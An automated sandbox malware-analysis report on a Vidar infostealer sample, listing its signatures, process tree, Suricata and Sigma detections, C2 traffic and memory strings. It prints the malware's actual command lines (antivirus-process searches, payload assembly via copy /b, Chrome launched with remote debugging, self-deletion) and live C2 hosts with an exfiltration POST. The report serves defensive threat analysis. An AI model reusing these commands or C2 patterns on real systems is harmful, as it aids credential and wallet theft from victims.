Edit tour

Windows Analysis Report
MatAugust.exe

Overview

General Information

Sample name:	MatAugust.exe
Analysis ID:	1582850
MD5:	39798d9bff4607f95df260ff89c564c0
SHA1:	a768d0f6bf5cbf67e17079610cd1e00f5638c66c
SHA256:	2e2f4121ad5623b152f88dd73801ca49bf7e90473d9bf6a3994e9462f4c585a4
Tags:	ClickFixexeuser-aachum
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected Vidar stealer

AI detected suspicious sample

Drops PE files with a suspicious file extension

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Uses 32bit PE files

Classification

Process Tree

System is w10x64

MatAugust.exe (PID: 7652 cmdline: "C:\Users\user\Desktop\MatAugust.exe" MD5: 39798D9BFF4607F95DF260FF89C564C0)

cmd.exe (PID: 7696 cmdline: "C:\Windows\System32\cmd.exe" /c move Expertise Expertise.cmd & Expertise.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7780 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7804 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7824 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7832 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7868 cmdline: cmd /c md 164676 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 7888 cmdline: extrac32 /Y /E Grab MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 7908 cmdline: findstr /V "slovenia" Contractors MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7920 cmdline: cmd /c copy /b 164676\Stopped.com + Zero + Refugees + Severe + Removal + Differential + Mph + Increasingly + Born + Convinced + Passenger 164676\Stopped.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7936 cmdline: cmd /c copy /b ..\Furnished + ..\Relative + ..\Calgary + ..\Pour + ..\Halfcom + ..\Nj + ..\Capitol + ..\Firewire + ..\Trees h MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Stopped.com (PID: 7964 cmdline: Stopped.com h MD5: 62D09F076E6E0240548C2F837536A46A)

chrome.exe (PID: 4324 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 --field-trial-handle=2272,i,12603068137312360975,10609379310723009523,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cmd.exe (PID: 1144 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com" & rd /s /q "C:\ProgramData\wlxlf" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 6028 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

choice.exe (PID: 7980 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Sigma Signatures

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Stopped.com h, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com, ParentProcessId: 7964, ParentProcessName: Stopped.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 4324, ProcessName: chrome.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Expertise Expertise.cmd & Expertise.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7696, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7832, ProcessName: findstr.exe

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T16:57:36.950101+0100	2044247	1	Malware Command and Control Activity Detected	116.203.14.4	443	192.168.2.4	49742	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T16:57:38.251011+0100	2051831	1	Malware Command and Control Activity Detected	116.203.14.4	443	192.168.2.4	49743	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T16:57:38.250808+0100	2049087	1	A Network Trojan was detected	192.168.2.4	49743	116.203.14.4	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T16:57:34.305147+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.4	49740	116.203.14.4	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: MatAugust.exe	Virustotal: Detection: 31%			Perma Link
Source: MatAugust.exe	ReversingLabs: Detection: 24%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.0% probability

Source: MatAugust.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.14.4:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: MatAugust.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\MatAugust.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\MatAugust.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\MatAugust.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 8MB later: 40MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49743 -> 116.203.14.4:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49740 -> 116.203.14.4:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.14.4:443 -> 192.168.2.4:49743
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.14.4:443 -> 192.168.2.4:49742

Source: global traffic

TCP traffic: 192.168.2.4:51506 -> 1.1.1.1:53

Source: global traffic

HTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.21.226
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.21.226
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.21.226
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.21.226
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /w211et HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: sdoout.lolConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000003.1986040811.0000250C00F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1985877113.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1986195980.0000250C00EC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000011.00000003.1986040811.0000250C00F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1985877113.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1986195980.0000250C00EC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000002.2062853756.0000250C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063707074.0000250C006C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000011.00000002.2062853756.0000250C0045C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: GeVuzPdhfiKPHBwrLx.GeVuzPdhfiKPHBwrLx
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: sdoout.lol
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----sjeknyus2nop8yuai5pzUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: sdoout.lolContent-Length: 255Connection: Keep-AliveCache-Control: no-cache

Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2063025589.0000250C00480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/32052
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498C
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000011.00000003.1980697538.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2065597817.0000250C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983552365.0000250C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1983597340.0000250C00854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
